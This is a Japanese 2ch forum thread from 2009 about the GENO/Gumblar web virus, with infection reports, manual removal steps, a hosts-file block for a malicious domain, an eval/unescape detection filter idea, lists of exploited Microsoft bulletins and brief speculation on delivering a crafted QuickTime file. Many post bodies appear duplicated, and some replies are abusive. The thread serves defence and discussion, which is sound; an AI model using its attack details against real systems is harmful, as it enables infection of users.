288 :192.168.0.774:2009/05/29(金) 19:30:11 ID:unRBn1g50
2chにかける串ってどこで探してる?
289 :192.168.0.774:2009/05/29(金) 19:47:31 ID:btAPZUmJ0
>>285
様々だからわからん(環境次第)
様々だからわからん(環境次第)
290 :192.168.0.774:2009/05/29(金) 20:19:51 ID:/RoVQptw0
はじめはリストで弾くようにしていたけれども、リストを更新するのが面倒になったので、
unscapeなんて文字コードをテーマにしたサイト以外は碌な目的で使わないよねと思って、
evalとunscapeを含むコードがあったら、とりあえずコメントアウトして、アラートを出すProxomitronのフィルタを書いたのだけれども、需要あるかな。
へっぽこだから、ブログでこっそり公開しようかとも思ったのだけれども、需要があるようなら投下します。
unscapeなんて文字コードをテーマにしたサイト以外は碌な目的で使わないよねと思って、
evalとunscapeを含むコードがあったら、とりあえずコメントアウトして、アラートを出すProxomitronのフィルタを書いたのだけれども、需要あるかな。
へっぽこだから、ブログでこっそり公開しようかとも思ったのだけれども、需要があるようなら投下します。
291 :192.168.0.774:2009/05/29(金) 20:24:16 ID:KFlNWkjO0
ヒント:Google Analytics
292 :192.168.0.774:2009/05/29(金) 20:46:38 ID:OlQbOmgA0
293 :192.168.0.774:2009/05/29(金) 23:13:11 ID:zmeqzjSv0
294 :192.168.0.774:2009/05/29(金) 23:28:16 ID:Si5aZKJwP
295 :192.168.0.774:2009/05/30(土) 00:31:39 ID:e8IE9Rq3P
すっかり過疎ったな
296 :192.168.0.774:2009/05/30(土) 00:50:24 ID:2UGL94hdO
GENOに感染したまま、気付かずに1ヶ月ほどPC利用していました。
HP等は開設しついません。
個人情報が漏れるそうですが、ネットショッピングの際のログインパスワード等は大丈夫なのでしょうか?
HP等は開設しついません。
個人情報が漏れるそうですが、ネットショッピングの際のログインパスワード等は大丈夫なのでしょうか?
297 :192.168.0.774:2009/05/30(土) 01:08:14 ID:NJoQk9Ql0
抜かれる可能性があると言われてたけどまだ報告はなかったような
心配だったら履歴を確認してパス変更でいんじゃね?インスコ済の話ね
心配だったら履歴を確認してパス変更でいんじゃね?インスコ済の話ね
298 :192.168.0.774:2009/05/30(土) 01:30:00 ID:ja4TbjLv0
前に、クローズアップ現代でボットの話題をやった回の動画ないですか?
299 :192.168.0.774:2009/05/30(土) 01:32:59 ID:i+8LuJWk0
>>298
うっせえハゲ。
うっせえハゲ。
300 :192.168.0.774:2009/05/30(土) 01:34:43 ID:2UGL94hdO
>>297
レスありがとうございます。
契約者名で大量のスパムが来ていたから変だとは思っていたんです。
現在は隔離済みです。
パスは一応変更しておきます。
1日10分ほどしか立ち上げないPCだったため、スケジュールスキャンをオフにしていましたorz
レスありがとうございます。
契約者名で大量のスパムが来ていたから変だとは思っていたんです。
現在は隔離済みです。
パスは一応変更しておきます。
1日10分ほどしか立ち上げないPCだったため、スケジュールスキャンをオフにしていましたorz
301 :192.168.0.774:2009/05/30(土) 01:45:18 ID:Xadobnvw0
なるべくならOSいれなおしたほうがいいけどお好みで
そのあとにオンラインサービス各種のパスワード変更
フリーメールのパスワードも変えてね
そのあとにオンラインサービス各種のパスワード変更
フリーメールのパスワードも変えてね
302 :192.168.0.774:2009/05/30(土) 02:09:41 ID:ja4TbjLv0
303 :192.168.0.774:2009/05/30(土) 06:37:58 ID:gEls4z/j0
だいたいアフィチェッカーよりもatwikiがどんだけ儲けてると思ってるんだよ糞
yahooとか使うなよハゲ
論理的思考ができない嫌儲はBOTに感染して苦しむべき
yahooとか使うなよハゲ
論理的思考ができない嫌儲はBOTに感染して苦しむべき
304 :192.168.0.774:2009/05/30(土) 09:10:48 ID:tVJG0Fy00
なんかもうGENO関係なくね
305 :192.168.0.774:2009/05/30(土) 09:14:25 ID:K6dO28la0
沈静化したということで喜ぼう。
306 :192.168.0.774:2009/05/30(土) 09:28:15 ID:P85iemiB0
QT周りの脆弱性狙いでまもなく再開するよ。
307 :192.168.0.774:2009/05/30(土) 09:42:07 ID:cGiKVc7U0
パソコンの中のQTを検索してみたら、adobeの中にあったんだけど、大丈夫なんでしょうか?
もちろん最新バージョンにしています。
もちろん最新バージョンにしています。
308 :192.168.0.774:2009/05/30(土) 10:03:58 ID:qdysrUs00
QTってゼロデイ状態じゃなかったっけ?
なんか、DirectXまで出てきたし、やり方確立したら騒ぎになるかもね
なんか、DirectXまで出てきたし、やり方確立したら騒ぎになるかもね
309 :192.168.0.774:2009/05/30(土) 10:22:10 ID:P85iemiB0
310 :192.168.0.774:2009/05/30(土) 13:34:46 ID:xI0fhZRq0
メモ
ttp://www3.atword.jp/gnome/2009/05/30/microsoft-slashed-quicktime-due-to-directshow-vulnerability/
ttp://www3.atword.jp/gnome/2009/05/30/microsoft-slashed-quicktime-due-to-directshow-vulnerability/
311 :192.168.0.774:2009/05/30(土) 14:40:48 ID:u7Zs/D5w0
purser: 旅客係(一般人の意味のパーサー。<=>IT用語のパーサ)
ぐのむたんしっかり汁w
なんにせ、マルチメディア系のもんは何だって信用ならん
…みんなまるごと砂箱逝き。
ぐのむたんしっかり汁w
なんにせ、マルチメディア系のもんは何だって信用ならん
…みんなまるごと砂箱逝き。
312 :192.168.0.774:2009/05/30(土) 15:26:29 ID:vgPL/By80
ttp://headlines.yahoo.co.jp/hl?a=20090530-00000433-yom-soci
>同省岐阜国道事務所の道路状況を伝えるサイトも改ざんされ、
>閲覧者のパソコンがコンピューターウイルスに感染する状態になっていた。
>改ざんは同7日から行われていたとみられ、
>2度にわたって利用者から「ウイルスが検知された」と指摘されていたが、
>同事務所では24日までシステムを停止しなかった。
>その間のサイト閲覧件数は7000件以上に上っている。
これもしかしてGENOか?
>同省岐阜国道事務所の道路状況を伝えるサイトも改ざんされ、
>閲覧者のパソコンがコンピューターウイルスに感染する状態になっていた。
>改ざんは同7日から行われていたとみられ、
>2度にわたって利用者から「ウイルスが検知された」と指摘されていたが、
>同事務所では24日までシステムを停止しなかった。
>その間のサイト閲覧件数は7000件以上に上っている。
これもしかしてGENOか?
313 :192.168.0.774:2009/05/30(土) 15:30:56 ID:K6dO28la0
国交省のかな?そんな報告あったはず。
314 :192.168.0.774:2009/05/30(土) 16:26:14 ID:+gwIZfhs0
>>312
>2度にわたって利用者から「ウイルスが検知された」と指摘されていたが、
>同事務所では24日までシステムを停止しなかった。
>その間のサイト閲覧件数は7000件以上に上っている。
ひどい話だな。GENOだろ
>2度にわたって利用者から「ウイルスが検知された」と指摘されていたが、
>同事務所では24日までシステムを停止しなかった。
>その間のサイト閲覧件数は7000件以上に上っている。
ひどい話だな。GENOだろ
315 :192.168.0.774:2009/05/30(土) 16:53:10 ID:ClpJp3oP0
だいたい半数がXP/2000ユーザーだとすると、それでも3500件か…。
316 :192.168.0.774:2009/05/30(土) 19:01:05 ID:ZoOVnb3tO
色々デカイサイトが感染してると
俺のサイトで感染したのが誤魔化せるからありがてー
俺のサイトで感染したのが誤魔化せるからありがてー
317 :192.168.0.774:2009/05/30(土) 19:39:19 ID:3MWi+wus0
新しいPCかOS買えウィルス?
318 :192.168.0.774:2009/05/30(土) 20:39:53 ID:u7Zs/D5w0
買ったら負けかなと思ってる奴は、意地で買わんから、ま、そんなにそうはならんだろ
319 :192.168.0.774:2009/05/30(土) 22:28:33 ID:J5jeyF8C0
QuickTimeってadobe製品なんですか?
320 :192.168.0.774:2009/05/30(土) 22:42:02 ID:rUA0di420
GoogleはAdobe製品じゃないですよ
321 :192.168.0.774:2009/05/31(日) 02:43:28 ID:+yn1Qi0T0
GENOウイルスチェッカーのサイトいったら
フラッシュでIE用の更新が来てたが
adobeのサイトからはどうやっていくんだ?
チェッカーのURLはexe直なので、なんかいや。
フラッシュでIE用の更新が来てたが
adobeのサイトからはどうやっていくんだ?
チェッカーのURLはexe直なので、なんかいや。
322 :192.168.0.774:2009/05/31(日) 02:54:04 ID:Ncu0YETE0
>>321
調子こいてんじゃねえよ、クズが
調子こいてんじゃねえよ、クズが
323 :192.168.0.774:2009/05/31(日) 03:05:14 ID:nxL2UMVc0
ブログのコメント欄や、wikiに大量に投下されるスパムは
GENOと関係ありますか?
GENOと関係ありますか?
324 :192.168.0.774:2009/05/31(日) 03:21:53 ID:L/RlP11XP
いいえ
325 :192.168.0.774:2009/05/31(日) 12:36:21 ID:f92421kK0
326 :192.168.0.774:2009/05/31(日) 14:56:31 ID:qnzGlpd70
PCに詳しいこちらの住人の皆様に聞きたいのですが…
GENOも大分落ち着いた…ということを聞き、久しぶりに趣味の
サイト巡りをしていたところ、私のPCのセキュリティが何らかの
ウィルスに反応し、削除(?)を行いました。
念のため、【まとめ】にあるやり方を見ながら再度ウィルスチェック
をしたところ、幸いなことに私のパソコン(Vista)は感染を免れて
いました。
こういった場合、サイトはウィルスに侵されていると考えてもよいので
しょうか?表ページには週2回の自動ウィルスチェックが入っていると
なっていましたが…。
もしウィルスに侵されているのならば、ほかの人がウィルスに侵される
危険があります。なので、管理人さんにウィルスに侵されているのでは?
とメールを送りたいのですが、今度閲覧してウィルスに侵されたら…と
思うと、恐ろしくてもう一度そのサイトを開く気になれないのです。
こういった場合、何らかの伝達手段はありますでしょうか?
GENOも大分落ち着いた…ということを聞き、久しぶりに趣味の
サイト巡りをしていたところ、私のPCのセキュリティが何らかの
ウィルスに反応し、削除(?)を行いました。
念のため、【まとめ】にあるやり方を見ながら再度ウィルスチェック
をしたところ、幸いなことに私のパソコン(Vista)は感染を免れて
いました。
こういった場合、サイトはウィルスに侵されていると考えてもよいので
しょうか?表ページには週2回の自動ウィルスチェックが入っていると
なっていましたが…。
もしウィルスに侵されているのならば、ほかの人がウィルスに侵される
危険があります。なので、管理人さんにウィルスに侵されているのでは?
とメールを送りたいのですが、今度閲覧してウィルスに侵されたら…と
思うと、恐ろしくてもう一度そのサイトを開く気になれないのです。
こういった場合、何らかの伝達手段はありますでしょうか?
327 :192.168.0.774:2009/05/31(日) 15:02:15 ID:YRT85t+60
>>326
携帯で開いて知らせれば?PCビューアーとか今はついてるでしょ
携帯で開いて知らせれば?PCビューアーとか今はついてるでしょ
328 :192.168.0.774:2009/05/31(日) 15:10:08 ID:Ncu0YETE0
>>326
パソコン持って逃げろ
パソコン持って逃げろ
329 :192.168.0.774:2009/05/31(日) 15:10:43 ID:qnzGlpd70
330 :192.168.0.774:2009/05/31(日) 15:43:20 ID:yExQo+6e0
>>329
URLをここに晒せばいいじゃん。
URLをここに晒せばいいじゃん。
331 :192.168.0.774:2009/05/31(日) 16:41:46 ID:9R9WK3IZ0
感染しました。
http://geno.2ch.tc/
の「GENOウイルス感染からの復帰方法」を途中までやってわからなくなってしまいました。
* C:\WINDOWS\Prefetch 内を全部削除
* [Windowsキー] + [R] を押してファイル名を指定して実行で msconfig
* スタートアップに何も書かれていない行があったのでチェックをOFF
* regeditを起動して(起動できない場合は command を実行してその中から regedit を実行)
* \\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの一番上が (規定) REG_SZ (値の設定無し) になっていることを確認 再起動
* C:\WINDOWS\System32\sqlsodbc.chm を削除 → 復活しないことを確認
* 正常なsqlsodbc.chmに差し替え
コマンドプロンプトでreceditを起動し
「〜の一番上が (規定) REG_SZ (値の設定無し) になっていることを確認」
する方法を教えていただけないでしょうか。
http://geno.2ch.tc/
の「GENOウイルス感染からの復帰方法」を途中までやってわからなくなってしまいました。
* C:\WINDOWS\Prefetch 内を全部削除
* [Windowsキー] + [R] を押してファイル名を指定して実行で msconfig
* スタートアップに何も書かれていない行があったのでチェックをOFF
* regeditを起動して(起動できない場合は command を実行してその中から regedit を実行)
* \\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの一番上が (規定) REG_SZ (値の設定無し) になっていることを確認 再起動
* C:\WINDOWS\System32\sqlsodbc.chm を削除 → 復活しないことを確認
* 正常なsqlsodbc.chmに差し替え
コマンドプロンプトでreceditを起動し
「〜の一番上が (規定) REG_SZ (値の設定無し) になっていることを確認」
する方法を教えていただけないでしょうか。
332 :192.168.0.774:2009/05/31(日) 16:47:45 ID:+8joFj3w0
>>331
リカバリしろカス
リカバリしろカス
333 :192.168.0.774:2009/05/31(日) 16:55:57 ID:pWZzGSp1P
c:\>reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
334 :192.168.0.774:2009/05/31(日) 18:51:04 ID:c3DaDWZu0
あのサイト見るな
不十分サイト
1修正案
■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
とりあえず最新版にしましょう。
インストール後本体をアップデートしておく事
adobe readerを開いて ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp
以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
FirefoxにてNoscriptを利用
(Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
(sleipnir、IEでも上手に設定するとなんとかなります)
優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
hostsファイルの在処
Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
Windows 95/98/MEの場合→「C:\Windows」
不十分サイト
1修正案
■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
とりあえず最新版にしましょう。
インストール後本体をアップデートしておく事
adobe readerを開いて ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp
以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
FirefoxにてNoscriptを利用
(Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
(sleipnir、IEでも上手に設定するとなんとかなります)
優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
hostsファイルの在処
Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
Windows 95/98/MEの場合→「C:\Windows」
335 :192.168.0.774:2009/05/31(日) 20:05:10 ID:Cyam+zfo0
Firefoxも基本機能の設定でスクリプトを無効にできる。
Noscriptほか拡張は、それ以上を求める人向け。
Noscriptほか拡張は、それ以上を求める人向け。
336 :192.168.0.774:2009/05/31(日) 20:18:52 ID:nC9VmBzmO
前まではNosc使って許可するしないで迷ってたけど
根本から切っちゃったらラクになれたわ
根本から切っちゃったらラクになれたわ
337 :192.168.0.774:2009/05/31(日) 20:28:11 ID:ptHEwX4Z0
>>334
粘着死ねうざい
粘着死ねうざい
338 :192.168.0.774:2009/05/31(日) 20:34:33 ID:ez9DL56A0
SINEとかいうんだ
勝手にテンプレ変えてヒッシだな
勝手にテンプレ変えてヒッシだな
339 :192.168.0.774:2009/05/31(日) 22:03:41 ID:VISqyoYW0
340 :192.168.0.774:2009/05/31(日) 22:10:59 ID:wzRIkfFE0
役にたたねえよ
341 :192.168.0.774:2009/05/31(日) 22:20:47 ID:wzRIkfFE0
まーテンプレは直さな
セキュ板の話題だ言っても
引用先はそれでかしらんが修正したんだからな
脈絡無くリンク入ってるし
セキュ板の話題だ言っても
引用先はそれでかしらんが修正したんだからな
脈絡無くリンク入ってるし
342 :192.168.0.774:2009/06/01(月) 01:23:58 ID:R+p/tPKN0
>>339
管理人乙です。
管理人乙です。
343 :192.168.0.774:2009/06/01(月) 16:50:37 ID:gRaxrwT0P
新たな「Webウイルス」出現、2万件以上の正規サイトに埋め込まれる
「Glumbler」ウイルスとは別物、対策ソフトを使っていても被害の恐れ
http://itpro.nikkeibp.co.jp/article/NEWS/20090601/331097/
「Glumbler」ウイルスとは別物、対策ソフトを使っていても被害の恐れ
http://itpro.nikkeibp.co.jp/article/NEWS/20090601/331097/
344 :192.168.0.774:2009/06/01(月) 17:20:49 ID:RXEaw0Ub0
345 :192.168.0.774:2009/06/01(月) 18:22:36 ID:o7C9L8Ls0
346 :192.168.0.774:2009/06/01(月) 18:26:43 ID:r9BK4C1O0
き弱性・・・?
347 :192.168.0.774:2009/06/01(月) 18:37:50 ID:vHlvNban0
もろよわせいだろjk
348 :192.168.0.774:2009/06/01(月) 18:44:12 ID:sEf/HHkG0
マジか?
こんどは何の脆弱性使用してるんだ?
収束したと思って、普通にサイト見始めちゃってたよ。
こんどは何の脆弱性使用してるんだ?
収束したと思って、普通にサイト見始めちゃってたよ。
349 :192.168.0.774:2009/06/01(月) 18:47:57 ID:W/jhCmDA0
つかってる脆弱性そのものは同じじゃないのかな
350 :192.168.0.774:2009/06/01(月) 18:53:12 ID:sEf/HHkG0
リンク先見ると、virustotal へのリンクあるね。
対応してる4社の名前も確認できるかも。
しかし、トレンドマイクロが対応してるとは…
DrWebも対応してるみたいだし、CureItで検索かけてみるかな…
対応してる4社の名前も確認できるかも。
しかし、トレンドマイクロが対応してるとは…
DrWebも対応してるみたいだし、CureItで検索かけてみるかな…
351 :192.168.0.774:2009/06/01(月) 19:04:20 ID:B9YOsgHE0 BE:1789209869-2BP(0)
偽GAってのは、 googleanalytlcs.net らしい
一応すでにぐぐるSB入りしてるけど、ぐぐるSB非対応のブラウザは注意が必要
一応すでにぐぐるSB入りしてるけど、ぐぐるSB非対応のブラウザは注意が必要
352 :192.168.0.774:2009/06/01(月) 19:20:34 ID:G/58Ch8R0
何だよ再燃かよ。これからどんどん出てくるかね
353 :192.168.0.774:2009/06/01(月) 19:31:48 ID:EN9NgtDC0
結局クーグルちょろめ最強か
354 :192.168.0.774:2009/06/01(月) 20:57:57 ID:qG9351lq0
ぐぐるSBってなに?
355 :192.168.0.774:2009/06/01(月) 21:18:46 ID:B9YOsgHE0 BE:2087410897-2BP(0)
356 :192.168.0.774:2009/06/01(月) 21:55:31 ID:B9YOsgHE0 BE:894604493-2BP(0)
MS06-014 KB911562 (MDAC)
MS06-057 KB923191 (WebViewFolderIcon)
MS06-067 KB922760 (WinZip, killbit)
MS09-002 KB961260 (IE7)
QuickTime: わからんが、2007年には出現していた手口の様子
…MS09-002 以外、なんか古いやつばっかり…本命じゃないの掴まされたかな
てきとーにスクリプト読み直してみるか
MS06-057 KB923191 (WebViewFolderIcon)
MS06-067 KB922760 (WinZip, killbit)
MS09-002 KB961260 (IE7)
QuickTime: わからんが、2007年には出現していた手口の様子
…MS09-002 以外、なんか古いやつばっかり…本命じゃないの掴まされたかな
てきとーにスクリプト読み直してみるか
357 :192.168.0.774:2009/06/01(月) 23:21:23 ID:gRaxrwT0P
MS06-014は常連だなあ
358 :192.168.0.774:2009/06/03(水) 15:08:36 ID:3dZzweiq0
Acrobat,Flash,QTとかの類は全部アンインストールして
Javascript切るしかないな
Javascript切るしかないな
359 :192.168.0.774:2009/06/03(水) 15:13:30 ID:2xEHinnPP
終息したみたいだね
360 :192.168.0.774:2009/06/03(水) 15:24:36 ID:5t7XiWC30
出遅れたけど聞いておこう。
ffdshowみたいなコーデック集にも、同じ脆弱性あるのかな?
ffdshowみたいなコーデック集にも、同じ脆弱性あるのかな?
361 :192.168.0.774:2009/06/03(水) 15:36:24 ID:U4wE4RiO0
なんという無意味な問いだ
広い意味では同じ脆弱性があるとも言えるが
狭い意味では同じ脆弱性があるわけないだろ
広い意味では同じ脆弱性があるとも言えるが
狭い意味では同じ脆弱性があるわけないだろ
362 :192.168.0.774:2009/06/03(水) 23:44:13 ID:/fJlB1oR0
偽サイトにユーザーをリダイレクトするコードが蔓延--ウェブセンスが警告
http://japan.cnet.com/news/media/story/0,2000056023,20394265,00.htm
http://japan.cnet.com/news/media/story/0,2000056023,20394265,00.htm
363 :192.168.0.774:2009/06/04(木) 20:51:18 ID:ovRMQuOx0
>>209 とりあえずは塞がれたらしい。
iPhone OS 3.0対応の「iTunes 8.2」公開、「QuickTime 7.6.2」も
http://internet.watch.impress.co.jp/cda/news/2009/06/02/23636.html
iPhone OS 3.0対応の「iTunes 8.2」公開、「QuickTime 7.6.2」も
http://internet.watch.impress.co.jp/cda/news/2009/06/02/23636.html
364 :192.168.0.774:2009/06/04(木) 21:14:00 ID:ek6ha3Fn0
でもDirectShowの脆弱性が解決してないので
QuickTime関連がヤバイ現状には変化なしw
QuickTime関連がヤバイ現状には変化なしw
365 :192.168.0.774:2009/06/04(木) 22:17:47 ID:9yOhj3HV0
それはQTではなくDXの問題
それにウェブブラウジング中にDX動かすなんてのもないと思う
それにウェブブラウジング中にDX動かすなんてのもないと思う
366 :192.168.0.774:2009/06/04(木) 22:48:03 ID:ASeSs5VK0
QuickTime側入れ替えても解決しない問題箇所だからね。
367 :192.168.0.774:2009/06/04(木) 23:39:31 ID:fBOkvqee0
まぁ、QTが対策されたことによって、webから直接DirectShowの穴叩くのは難しくなったか
368 :192.168.0.774:2009/06/04(木) 23:57:02 ID:yg7JUHlK0
>>364-366で指摘してるDirectShowの問題って
http://internet.watch.impress.co.jp/cda/news/2009/05/29/23606.html
の事だよな?
DirectShowのファイルオープンってフィルタ・スプリッタ経由でやってるはずで、
QT用フィルタ・スプリッタが無ければQT開くもヘッタクレも無いはずだから、
これはQT用フィルタ・スプリッタのバグで起きてる問題だと見るべきだよな。
・・・素直にDirectShow用QTコーデックのバグって書いて欲しい。
そうすると、改変QTファイルをDirectShow利用プログラム経由でQT用フィルタ・スプリッタに通すと発症するって事になる。
で、DirectShow用QTコーデックのバグには>>363では触れられてない。
>>367
なので全く難しくなってません。
そもそもQTPlayerでは自前でデコードするだろうから、QTPlayerでQT開く時には元々発症しないんじゃないかな。
http://internet.watch.impress.co.jp/cda/news/2009/05/29/23606.html
の事だよな?
DirectShowのファイルオープンってフィルタ・スプリッタ経由でやってるはずで、
QT用フィルタ・スプリッタが無ければQT開くもヘッタクレも無いはずだから、
これはQT用フィルタ・スプリッタのバグで起きてる問題だと見るべきだよな。
・・・素直にDirectShow用QTコーデックのバグって書いて欲しい。
そうすると、改変QTファイルをDirectShow利用プログラム経由でQT用フィルタ・スプリッタに通すと発症するって事になる。
で、DirectShow用QTコーデックのバグには>>363では触れられてない。
>>367
なので全く難しくなってません。
そもそもQTPlayerでは自前でデコードするだろうから、QTPlayerでQT開く時には元々発症しないんじゃないかな。
369 :192.168.0.774:2009/06/05(金) 00:22:27 ID:wJ6nVbq00
要するに、脆弱性の解決したQTプレイヤーの最新版を入れて
それでQTファイルを開く分には問題ないってこと?
それでQTファイルを開く分には問題ないってこと?
370 :192.168.0.774:2009/06/05(金) 00:53:14 ID:geb9McX00
大昔、QuickTimeを、Windowsのメディアプレーヤで再生できた時期があったんだよ
そのときの名残が、最近ではWindows同梱のquartz.dll ってのにあって、そこが問題になってる
アンチAppleにはどっちにしたってむかつく話だろうが、とりあえずQuickTime更新しても、
MSが修繕して、アップデートしてくれるまでは、こっちは直らないわけだな
そのときの名残が、最近ではWindows同梱のquartz.dll ってのにあって、そこが問題になってる
アンチAppleにはどっちにしたってむかつく話だろうが、とりあえずQuickTime更新しても、
MSが修繕して、アップデートしてくれるまでは、こっちは直らないわけだな
371 :192.168.0.774:2009/06/05(金) 01:13:28 ID:SMLB9Vzg0
誰が使ってるのかわからないような機能がいちばん危険だよな。
372 :192.168.0.774:2009/06/05(金) 01:50:42 ID:geb9McX00
PDFもそう。確かに、分野によっては欠かせないものだが、それ以上に幅広く、
無駄にPCにプレインスコされて出荷され、そのまま死蔵になってる
回線がしっかりしてれば、いるときに落としてくればいいと思うんだけどな
とはいっても、いざというときに目を通したことにしておいてくださいという
周辺機器の説明書がPDFだと、どうしてもリーダも同梱になっちまう
無駄にPCにプレインスコされて出荷され、そのまま死蔵になってる
回線がしっかりしてれば、いるときに落としてくればいいと思うんだけどな
とはいっても、いざというときに目を通したことにしておいてくださいという
周辺機器の説明書がPDFだと、どうしてもリーダも同梱になっちまう
373 :192.168.0.774:2009/06/05(金) 01:57:08 ID:VdpfbXko0
大昔に入れたクイックタイムおるたなんとかが入れっぱなしになってるんだが
消したほうがいいのかな
消したほうがいいのかな
374 :192.168.0.774:2009/06/05(金) 02:00:01 ID:kF2EDitC0
>>372
んだんだ。
周辺機器のマニュアルの類はpdfであることが多いよな。
ルータも無線カードもMOも外付けHDDも複合機も、
更にメーカー製だとバンドルソフトのマニュアルまでもがpdfだったり。
んだんだ。
周辺機器のマニュアルの類はpdfであることが多いよな。
ルータも無線カードもMOも外付けHDDも複合機も、
更にメーカー製だとバンドルソフトのマニュアルまでもがpdfだったり。
375 :192.168.0.774:2009/06/05(金) 02:45:18 ID:eYXhsJxW0
376 :192.168.0.774:2009/06/05(金) 03:00:29 ID:6SIDmEC50
ある程度の普及率を持つソフトウェアは全て
・最新バージョンチェック機能つきインストーラ
→CDに同梱する場合等、オフライン環境にもインストールが可能であり、オンライン環境ならば最新版をインストールできるのが望ましい
・実装上再セットアップであってもそれを意識させないオンラインアップデート機能
→インストーラのダウンロードまでしか面倒を見ない物だと、入れるのが億劫になって無視しがち
・明確なスケジュール・トリガのあるアップデートチェック機能
→いくら修正しても、アップデート通知が出なかったりしたら意味ないですよ、Adobeさん、Symantecさん。
を持っていてくれないと危なっかしくてしようが無い
・・・と思う。
コーデックみたいなプラグイン系はちょっと難しい所があるのが難だが・・・
起動時にアップデータをRunOnceに放り込むとかで常駐無しに安全性を確保することも不可能じゃないのにな。
・最新バージョンチェック機能つきインストーラ
→CDに同梱する場合等、オフライン環境にもインストールが可能であり、オンライン環境ならば最新版をインストールできるのが望ましい
・実装上再セットアップであってもそれを意識させないオンラインアップデート機能
→インストーラのダウンロードまでしか面倒を見ない物だと、入れるのが億劫になって無視しがち
・明確なスケジュール・トリガのあるアップデートチェック機能
→いくら修正しても、アップデート通知が出なかったりしたら意味ないですよ、Adobeさん、Symantecさん。
を持っていてくれないと危なっかしくてしようが無い
・・・と思う。
コーデックみたいなプラグイン系はちょっと難しい所があるのが難だが・・・
起動時にアップデータをRunOnceに放り込むとかで常駐無しに安全性を確保することも不可能じゃないのにな。
377 :192.168.0.774:2009/06/05(金) 03:32:03 ID:geb9McX00
アップデートするモチベがない
アップデートすると、重くなる(かも?って勝手な予想するのも含む)となると、余計アップデートしない
せめて、オフライン版は、ブラウザにプラグイン入れない。とか。w
腐ったファイルをメールに添付して踏ませるのには無効だが、ブラウザ経由でってのは減らせそう
アップデートすると、重くなる(かも?って勝手な予想するのも含む)となると、余計アップデートしない
せめて、オフライン版は、ブラウザにプラグイン入れない。とか。w
腐ったファイルをメールに添付して踏ませるのには無効だが、ブラウザ経由でってのは減らせそう
378 :192.168.0.774:2009/06/05(金) 09:19:48 ID:jt2tl6gS0
wmv呼び出すようにwebに貼り付けて、細工したqt再生するようにしておけばイケるのか
まぁ、Win7への移行が進めばASLRが効くから、この手の問題はおおよそ解決するんじゃないかな
あとは、携帯みたいに、機種毎に微妙に仕様違っていて、影響範囲が限定的になるとか。
そうやって考えると、数年前にASLR実装して、マイナー違いだらけのLinuxってすげぇよなとか思ったり。
まぁ、Win7への移行が進めばASLRが効くから、この手の問題はおおよそ解決するんじゃないかな
あとは、携帯みたいに、機種毎に微妙に仕様違っていて、影響範囲が限定的になるとか。
そうやって考えると、数年前にASLR実装して、マイナー違いだらけのLinuxってすげぇよなとか思ったり。
379 :192.168.0.774:2009/06/05(金) 11:02:29 ID:9oazRdMR0
380 :192.168.0.774:2009/06/05(金) 15:20:40 ID:geb9McX00
>>379
quartz.dll が、そのQuickTime(それも旧形式)だけをみてるんなら、あぼんすればおしまいなんだけど、
他にもいろいろ基盤的な処理をしてるDLLなので、一概にそうもできないわけね
IEとかと同様、どうしてもバグフリーにできない複雑なコンポーネントだから、ビジネス用途の端末とか、
動画とか一切いらないPCなら、あぼんしとけばいいかも 実際にそういう攻撃遮断策も紹介されてる
だいたい、そうゆうもん
quartz.dll が、そのQuickTime(それも旧形式)だけをみてるんなら、あぼんすればおしまいなんだけど、
他にもいろいろ基盤的な処理をしてるDLLなので、一概にそうもできないわけね
IEとかと同様、どうしてもバグフリーにできない複雑なコンポーネントだから、ビジネス用途の端末とか、
動画とか一切いらないPCなら、あぼんしとけばいいかも 実際にそういう攻撃遮断策も紹介されてる
だいたい、そうゆうもん
381 :192.168.0.774:2009/06/05(金) 16:41:00 ID:5sVAYN+A0
>>376
あとは ADM とか配布して組織内で集中管理出来るようにしてほしいね。
あとは ADM とか配布して組織内で集中管理出来るようにしてほしいね。
382 :192.168.0.774:2009/06/06(土) 14:59:57 ID:izh1au960
383 :192.168.0.774:2009/06/06(土) 16:42:22 ID:Xz0CFMXE0
これからもGENOと似たようなウイルスが普通に蔓延する模様
「Baladen」による大規模サイト改ざん、コード難読化で検知回避
http://internet.watch.impress.co.jp/cda/news/2009/06/03/23670.html
「Baladen」による大規模サイト改ざん、コード難読化で検知回避
http://internet.watch.impress.co.jp/cda/news/2009/06/03/23670.html
384 :192.168.0.774:2009/06/06(土) 17:41:02 ID:lqce6X1B0
>>382 ちょっと見ないうちに、こんなに便利になってたのか。あとでみてみる
385 :192.168.0.774:2009/06/06(土) 19:10:19 ID:lqce6X1B0
落としてみた。これは便利かもしれん sysinternal好きなら気に入るとおもわれ
386 :192.168.0.774:2009/06/07(日) 02:02:38 ID:M7AHivT40
sysinternal好きならっていうか、sysinternalそのものだよな
387 :192.168.0.774:2009/06/07(日) 07:34:05 ID:RGnVDoX80
sysinternal好きなら、sysinternalでなんとなーくそろえるでそw そゆ意味
388 :192.168.0.774:2009/06/07(日) 09:50:33 ID:2PGpvmxT0
389 :192.168.0.774:2009/06/07(日) 14:48:04 ID:1hLnbE2g0
>>388
